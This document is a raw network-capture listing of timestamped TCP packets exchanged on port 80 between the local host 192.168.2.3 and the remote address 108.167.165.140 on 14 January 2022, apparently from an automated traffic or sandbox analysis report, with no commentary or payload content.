Jan 14, 2022 13:49:26.526911020 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526911974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526936054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526941061 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526962042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526962042 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526988029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526988029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527013063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527013063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527036905 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527039051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527062893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527064085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527089119 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527091026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527113914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527116060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527138948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527141094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527163029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527168036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527189016 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527193069 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527219057 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527220011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527245998 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527250051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527270079 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527275085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527296066 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527302027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527318954 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527328014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527349949 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527354002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527370930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527379990 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527395964 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527405977 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527419090 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527431011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527447939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527456999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527476072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527482033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527501106 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527508020 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527524948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527534962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527549028 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527559042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527574062 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527586937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527601957 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527614117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527637005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527638912 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527664900 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527673006 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527690887 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527719021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527729988 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527734041 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527745008 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527750969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527770042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527774096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527796030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527798891 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527821064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527825117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527847052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527849913 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527873039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527875900 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527899981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527901888 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527926922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527931929 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527954102 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.527957916 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.527985096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.528011084 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.666300058 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.666331053 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.666347980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.666364908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.666383982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.666399956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.666419029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.666450024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.666495085 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.666501045 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673155069 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673177958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673196077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673212051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673245907 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673249960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673268080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673274040 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673285961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673301935 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673316002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673320055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673337936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673356056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673355103 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673372984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673391104 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673401117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673408031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673471928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673485994 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673594952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673651934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673672915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673681974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673691988 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673708916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673726082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673726082 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673743963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673759937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673760891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673778057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673798084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673815012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673831940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673836946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673861027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673882008 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673886061 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673892975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673898935 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673917055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673933029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673939943 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673949957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673966885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673985004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.673985958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.673996925 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674005032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674021006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674021006 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674041033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674057007 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674057961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674074888 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674092054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674103975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674109936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674128056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674144983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674150944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674160957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674176931 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674177885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674195051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674212933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674226999 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674230099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674240112 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674247980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674266100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674283981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674285889 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674300909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674316883 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674318075 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674335957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674352884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674367905 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674371004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674390078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674407005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674424887 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674441099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674462080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674465895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674474955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674480915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674496889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674506903 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674515963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674530029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674534082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674551964 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674561024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674568892 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674587011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674608946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674627066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674640894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674643993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674663067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674680948 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674698114 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674701929 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674715042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674732924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674734116 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674750090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674756050 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674767971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674782038 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674784899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674803019 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674818993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674823999 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674837112 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674854040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674863100 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674871922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674886942 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674889088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674906015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674916029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674922943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674938917 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674940109 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674957991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674973965 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.674981117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.674993038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.675010920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.675026894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.675038099 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.675044060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.675065041 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.675097942 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.813081026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.813112974 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.813132048 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.813188076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.813215971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.813218117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.813232899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.813250065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.813267946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.813328028 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.820055962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820090055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820102930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820120096 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820137978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820153952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820172071 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820188999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820204973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820223093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820235968 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.820240021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820255995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820272923 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820288897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820302010 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.820306063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820324898 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.820334911 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.820364952 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.821554899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821578026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821638107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821656942 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821679115 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.821712017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821723938 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.821729898 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821744919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821758986 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.821762085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821810007 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.821867943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821886063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821919918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821923971 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.821958065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821965933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.821974993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821991920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.821999073 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822009087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822026968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822043896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822073936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822088957 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822092056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822139978 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822182894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822200060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822216988 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822218895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822235107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822242022 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822252035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822269917 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822279930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822288036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822304010 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822314978 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822320938 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822338104 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822349072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822355032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822372913 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822387934 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822390079 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822407961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822424889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822428942 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822442055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822459936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822463989 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822477102 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822491884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822494030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822510958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822520971 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822529078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822546005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822563887 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822571993 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822580099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822597027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822601080 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822614908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822627068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822633028 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822650909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822668076 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822675943 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822685003 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822704077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822714090 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.822721958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822740078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.822746992 CET	49743	80	192.168.2.3	108.167.165.140
